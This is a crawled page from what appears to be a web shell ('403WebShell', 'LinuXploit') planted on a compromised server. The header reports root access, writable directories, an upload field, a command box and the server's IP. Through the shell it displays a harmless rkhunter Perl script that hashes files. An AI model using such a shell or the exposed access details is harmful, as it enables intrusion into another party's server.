Uname:Linux machinox-server 6.17.0-1013-aws #13~24.04.1-Ubuntu SMP Fri Apr 24 21:36:58 UTC 2026 aarch64

Base Dir : /var/www/machinox.in

User : root


403WebShell
403Webshell
Server IP : 13.235.167.51  /  Your IP : 216.73.217.116
Web Server : Apache
System : Linux machinox-server 6.17.0-1013-aws #13~24.04.1-Ubuntu SMP Fri Apr 24 21:36:58 UTC 2026 aarch64
User : root ( 0)
PHP Version : 8.2.29
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /proc/thread-self/root/usr/share/rkhunter/scripts/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /proc/thread-self/root/usr/share/rkhunter/scripts/filehashsha.pl
#!/usr/bin/perl

die "Usage: $0 <module name> <SHA size> <filename>" if ($#ARGV != 2);

my $sha = '';

my $mod = $ARGV[0];
my $size = $ARGV[1];
my $file = $ARGV[2];

eval "use $mod";

die "Invalid module: $mod" if ($@);

if ($mod eq 'Digest::SHA1' || $mod eq 'Digest::Whirlpool' || $mod eq 'Crypt::RIPEMD160' || $mod eq 'Digest::MD5') {
	$sha = $mod -> new;
}
elsif ($mod eq 'Digest::SHA256') {
	$sha = Digest::SHA256::new($size);
}
else {
	$sha = $mod -> new($size);
}

# Open file in binary mode
open(FILE, $file) or die "Can't open file '$file'";
binmode(FILE);

# Hash file contents
$sha -> add($_) while (<FILE>);

close(FILE);

$_ = $sha -> hexdigest;
s/ //g;
print $_, "\n";

exit;

Youez - 2016 - github.com/yon3zu
LinuXploit